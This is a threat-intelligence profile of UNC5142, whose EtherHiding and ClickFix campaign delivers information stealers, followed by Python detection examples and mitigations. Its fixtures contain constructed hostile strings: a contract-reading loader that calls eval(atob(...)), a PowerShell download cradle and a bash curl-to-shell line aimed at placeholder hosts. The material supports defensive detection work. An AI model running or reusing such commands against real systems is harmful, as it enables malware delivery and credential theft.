Full Report
A financially motivated threat actor codenamed UNC5142 has been observed abusing blockchain smart contracts as a way to facilitate the distribution of information stealers such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar, targeting both Windows and Apple macOS systems. "UNC5142 is characterized by its use of compromised WordPress websites and 'EtherHiding,' a technique used
Analysis Summary
# Threat Actor: UNC5142
## Attribution & Identity
* **Identified By:** Google Threat Intelligence Group (GTIG).
* **Known Aliases:** UNC5142.
* **Associated Groups:** The techniques and downloader used (CLEARSHORT) suggest a link to ClearFake, which was analyzed by Sekoia.
## Activity Summary
UNC5142 is a financially motivated threat actor observed abusing blockchain smart contracts to distribute malware. Their operations prominently feature the compromise of WordPress websites, often leading to the loading of custom JavaScript to initiate the multi-stage infection chain. The activity level peaked around June 2025, with approximately 14,000 infected web pages flagged, but reports indicate activity ceased after July 23, 2025. The group has shown operational evolution, moving from single-contract schemes to a more complex three-smart contract system (Router-Logic-Storage architecture) starting in November 2024.
## Tactics, Techniques & Procedures
* **Infection Vector:** Compromised WordPress websites (plugin files, theme files, or direct database injection).
* **Code Obfuscation/Distribution:** Use of "EtherHiding"—placing malicious code or data on a public blockchain (BNB Smart Chain/BSC) to increase resiliency against takedowns.
* **Dropper:** Employing a multi-stage JavaScript downloader dubbed **CLEARSHORT** (assessed as a variant of ClearFake).
* **Social Engineering:** Utilizing the **ClickFix** social engineering tactic (fake browser update warnings) to deceive victims into executing malicious commands via the Windows Run dialog or macOS Terminal.
* **Windows Execution Chain:**
1. Insertion of Stage 1 JavaScript.
2. The Stage 1 script queries the smart contract on BSC and uses the returned data to retrieve the CLEARSHORT landing page (often encrypted as of Dec 2024) from an external server or a Cloudflare .dev page.
3. Deception via ClickFix leading to execution of a command that downloads and runs an HTML Application (HTA) file from MediaFire.
4. HTA executes a PowerShell script to bypass defenses, fetch the final payload (from GitHub, MediaFire, or proprietary infrastructure), and execute the stealer directly in memory (fileless).
* **macOS Execution Chain:**
1. ClickFix decoy prompts user to run a bash command in Terminal.
2. The bash script retrieves a shell script.
3. The script uses `curl` to download the Atomic Stealer payload.
* **MITRE ATT&CK IDs (Inferred/Associated TTPs):** T1189 (Drive-by Compromise: compromised WordPress sites as the point of first contact), T1204 (User Execution: the ClickFix lure), T1059.007 / T1059.001 / T1059.004 (Command and Scripting Interpreter: JavaScript, PowerShell, Unix Shell), T1218.005 (System Binary Proxy Execution: Mshta, for the HTA stage), T1608.001 (Stage Capabilities: Upload Malware, for payloads hosted on GitHub, MediaFire and Cloudflare .dev pages), T1027 (Obfuscated Files or Information: EtherHiding and the encrypted landing pages).
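The EtherHiding step in the chain above, as an added example that is not part of the original page or of GTIG's report: the Python below first shows the data handling a stage-1 loader must do, decoding a `string` returned by a read-only contract call (the ABI layout of an `eth_call` result), and then applies the kind of static check a site owner could run over served JavaScript to catch an injected loader. The loader snippet, the contract address, the RPC host pattern and the stored payload are constructed for the example; the scan rule is an illustrative heuristic (a blockchain read plus dynamic code execution in the same script), not a published signature.

```python
import re

# --- 1. ABI encoding/decoding of a `string` returned by a read-only contract call ---
# Solidity ABI layout for a single `string` return value: a 32-byte offset to the
# string head (0x20), a 32-byte byte-length, then the UTF-8 bytes right-padded to 32.
def abi_encode_string(text: str) -> str:
    data = text.encode("utf-8")
    pad = (32 - len(data) % 32) % 32
    head = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    return "0x" + (head + data + b"\x00" * pad).hex()

def abi_decode_string(hexdata: str) -> str:
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 64 or len(raw) % 32:
        raise ValueError("not a well-formed ABI return blob")
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    body = raw[offset + 32:offset + 32 + length]
    if len(body) != length:  # declared length runs past the blob: reject, do not truncate
        raise ValueError("declared length exceeds payload")
    return body.decode("utf-8")

# Constructed stand-in for what the contract stores (a pointer to the next stage).
# A real campaign would store obfuscated/encrypted loader code or a landing-page URL.
ON_CHAIN_PAYLOAD = ('var s=document.createElement("script");'
                    's.src=atob("aHR0cHM6Ly9sYW5kaW5nLmV4YW1wbGUuaW52YWxpZC8=");'
                    'document.head.appendChild(s);')
RPC_RESULT = abi_encode_string(ON_CHAIN_PAYLOAD)  # what a public node's eth_call would return

# --- 2. Static check over served JavaScript: blockchain read + dynamic execution ---
CHAIN_RE = {
    # Illustrative pattern for the public BNB Smart Chain JSON-RPC hosts; extend for your environment.
    "public_bsc_rpc": re.compile(r'https?://[^\s"\']*bsc-dataseed[\w-]*\.binance\.org', re.I),
    "json_rpc_eth_call": re.compile(r"\beth_call\b"),
    "web3_library": re.compile(r"\bethers\.(?:Contract|JsonRpcProvider)\b|\bnew\s+Web3\s*\(|\bweb3\.eth\.call\b"),
}
EXEC_RE = {
    "eval": re.compile(r"\beval\s*\("),
    "function_ctor": re.compile(r"\bnew\s+Function\s*\("),
    "base64_decode": re.compile(r"\batob\s*\("),
    "script_injection": re.compile(r"""createElement\s*\(\s*['"]script['"]\s*\)|document\.write\s*\("""),
}
ADDRESS_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")

def scan_script(js: str) -> dict:
    """Flag a script that both reads a smart contract and decodes/executes dynamic code.
    Either half alone is common on legitimate pages; the pair is the EtherHiding tell."""
    chain = sorted(k for k, r in CHAIN_RE.items() if r.search(js))
    execs = sorted(k for k, r in EXEC_RE.items() if r.search(js))
    return {
        "chain_indicators": chain,
        "exec_indicators": execs,
        "contracts": sorted(set(ADDRESS_RE.findall(js))),  # candidate IOCs to track/block
        "suspicious": bool(chain) and bool(execs),
    }

# Constructed samples. CONTRACT is a placeholder address, not a real one.
CONTRACT = "0x" + "0" * 36 + "1234"
INJECTED_LOADER = (
    '(async()=>{const p=new ethers.JsonRpcProvider("https://bsc-dataseed.binance.org/");'
    'const c=new ethers.Contract("' + CONTRACT + '",["function get() view returns (string)"],p);'
    'const s=await c.get();eval(atob(s));})();'
)
BENIGN_DAPP = (
    'const provider=new ethers.JsonRpcProvider("https://bsc-dataseed.binance.org/");'
    'const bal=await provider.getBalance("' + "0x" + "0" * 36 + "5678" + '");'
    'document.getElementById("bal").textContent=ethers.formatEther(bal);'
)

if __name__ == "__main__":
    print("decoded:", abi_decode_string(RPC_RESULT))
    print("injected:", scan_script(INJECTED_LOADER))
    print("benign:", scan_script(BENIGN_DAPP))
```

The benign dapp reads the same public RPC host with the same library and is not flagged, which is the point of requiring both halves: on a content site that has no reason to talk to a blockchain at all, the `chain_indicators` list alone is already worth an alert, and the extracted contract addresses are the durable indicator, since the actor can rotate the hosting behind the contract without changing the address the loader queries.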
## Targeting
* **Sectors:** Not specified. Because the infection chain starts from compromised WordPress sites, the victims are whoever visits those sites, so targeting is indiscriminate rather than sector-specific.
* **Geography:** Not specified; the campaign affected Windows and Apple macOS users worldwide.
* **Victims:** Two populations: the vulnerable WordPress sites compromised en masse (approx. 14,000 flagged pages as of June 2025) and the visitors of those sites who followed the ClickFix lure. No specific victim organizations were named.
## Tools & Infrastructure
* **Malware Families (Information Stealers):** Atomic (AMOS), Lumma, Rhadamanthys (RADTHIEF), and Vidar.
* **Downloaders/Frameworks:** CLEARSHORT (variant of ClearFake).
* **Blockchain:** BNB Smart Chain (BSC) used to host malicious smart contracts.
* **C2/Payload Hosting:** Cloudflare .dev pages (for landing pages), MediaFire (for HTAs/payloads), GitHub (for payloads).
* **Source Reporting:**
    * `hxxps://cloud.google.com/blog/topics/threat-intelligence/unc5142-etherhiding-distribute-malware` (GTIG source article)
## Implications
UNC5142 represents a significant evolution in malware distribution. Storing the loader's pointer to the next stage on a public blockchain (EtherHiding) means that taking down the compromised websites or the hosting behind a campaign does not remove that stage, and the actor can repoint the contract's stored data to new infrastructure by updating its state rather than by re-injecting every site. The use of legitimate services (Cloudflare .dev pages, GitHub, MediaFire) for landing pages and payloads, combined with in-memory PowerShell execution of the final stealer, complicates both network-based blocking and host forensics, particularly for organizations relying on endpoint protection alone. The motivation is financial: the delivered payloads are information stealers.
## Mitigations
* Implement robust security practices for WordPress installations, including timely patching of core, themes, and plugins.
* Scrutinize the JavaScript your websites serve for injected scripts, especially ones that call a public blockchain JSON-RPC endpoint (for example BNB Smart Chain `eth_call` requests made through web3/ethers libraries) and then decode and execute what they receive; a content site has no business reading smart contracts.
* Monitor egress for downloads of HTA files and scripts from file-sharing services (MediaFire) or code repositories (GitHub) that are initiated by mshta.exe or PowerShell rather than by a browser, shortly after a user visited an otherwise ordinary website.
* For endpoint defense, block or restrict HTA execution (mshta.exe), alert on PowerShell launched with execution-policy bypass or a hidden window and on download cradles, and watch for information-stealer behaviour such as in-memory payload loading, since the Windows chain leaves little on disk. On macOS, alert on Terminal-launched shell commands that fetch a remote script with `curl` and execute it.
* Monitor blockchain activity for unusual contract deployments associated with known threat indicators, though this is a more advanced defensive measure.
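The endpoint guidance above (HTA and PowerShell on Windows, Terminal-launched `curl` on macOS), as an added example that is not taken from the original page: a small process-lineage detector in Python that walks parent/child relationships in constructed Sysmon/EDR-style process-creation events and flags the two ClickFix execution chains described in the TTP section. Hostnames, PIDs, paths, URLs and command lines are constructed for the example, and the two rules are illustrative; tune the regexes to your own telemetry.

```python
import re

# Constructed Sysmon EID 1 / EDR-style process-creation events; not real telemetry.
# Hostnames, PIDs, paths and URLs are placeholders.
EVENTS = [
    # win-01: ClickFix command pasted into the Run dialog, so explorer.exe spawns mshta.exe
    {"host": "win-01", "pid": 1200, "ppid": 4, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"host": "win-01", "pid": 3480, "ppid": 1200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://files.example.invalid/d/update.hta"},
    {"host": "win-01", "pid": 3512, "ppid": 3480,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
                ".DownloadString('https://files.example.invalid/d/s.ps1')\""},
    # win-02: an admin runs a script with -ep bypass from a console; no HTA in the lineage
    {"host": "win-02", "pid": 500, "ppid": 4, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"host": "win-02", "pid": 520, "ppid": 500,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ep bypass -File C:\ops\inventory.ps1"},
    # mac-01: ClickFix command pasted into Terminal; the login zsh spawns bash -c "$(curl ...)"
    {"host": "mac-01", "pid": 700, "ppid": 1,
     "image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmdline": "Terminal"},
    {"host": "mac-01", "pid": 710, "ppid": 700, "image": "/bin/zsh", "cmdline": "-zsh"},
    {"host": "mac-01", "pid": 722, "ppid": 710, "image": "/bin/bash",
     "cmdline": 'bash -c "$(curl -fsSL https://cdn.example.invalid/p/install.sh)"'},
    # mac-02: a build script downloads a tarball with curl but never feeds it to a shell
    {"host": "mac-02", "pid": 800, "ppid": 1, "image": "/bin/bash", "cmdline": "bash ./build.sh"},
    {"host": "mac-02", "pid": 801, "ppid": 800, "image": "/usr/bin/curl",
     "cmdline": "curl -O https://pkgs.example.invalid/tool.tgz"},
]

URL_RE = re.compile(r"https?://", re.I)
# PowerShell launched the way the HTA stage does it: policy bypass, hidden window, download cradle
PS_RE = re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass|-w(?:indowstyle)?\s+hidden|"
                   r"\biex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b", re.I)
# Remote script fetched and fed straight into a shell (command substitution, pipe, or base64 pipe)
MAC_RE = re.compile(r"\$\(\s*curl\b|\bcurl\b[^|]*\|\s*(?:ba|z)?sh\b|"
                    r"\bbase64\b[^|]*\|\s*(?:ba|z)?sh\b", re.I)

def _name(image: str) -> str:
    return re.split(r"[\\/]", image)[-1].lower()

def _ancestors(event: dict, by_pid: dict, depth: int = 4) -> list:
    """Image basenames of parent, grandparent, ... (nearest first), limited to `depth`."""
    names, cur = [], event
    for _ in range(depth):
        cur = by_pid.get((cur["host"], cur["ppid"]))
        if cur is None:
            break
        names.append(_name(cur["image"]))
    return names

def detect_clickfix_chains(events: list) -> list:
    by_pid = {(e["host"], e["pid"]): e for e in events}
    alerts = []
    for e in events:
        name, anc = _name(e["image"]), _ancestors(e, by_pid)
        chain = " -> ".join(list(reversed(anc)) + [name])
        # Windows: PowerShell whose parent is an mshta.exe that was handed a URL
        if name in ("powershell.exe", "pwsh.exe") and anc[:1] == ["mshta.exe"]:
            parent = by_pid[(e["host"], e["ppid"])]
            if URL_RE.search(parent["cmdline"]) and PS_RE.search(e["cmdline"]):
                alerts.append({"rule": "win_clickfix_hta_to_powershell", "host": e["host"],
                               "pid": e["pid"], "chain": chain})
        # macOS: a shell under Terminal (directly or via the login shell) that fetches and runs a remote script
        elif name in ("bash", "sh", "zsh") and "terminal" in anc[:2] and MAC_RE.search(e["cmdline"]):
            alerts.append({"rule": "mac_clickfix_terminal_curl_to_shell", "host": e["host"],
                           "pid": e["pid"], "chain": chain})
    return alerts

if __name__ == "__main__":
    for alert in detect_clickfix_chains(EVENTS):
        print(alert)
```

The Windows rule keys on lineage rather than on the MediaFire or GitHub hostnames, because the page shows the actor mixing several hosting services; what does not change is that a URL-launched HTA spawns PowerShell with a bypass or cradle. The admin's `-ep bypass` on win-02 is not flagged for the same reason: its parent is a console, not mshta.exe.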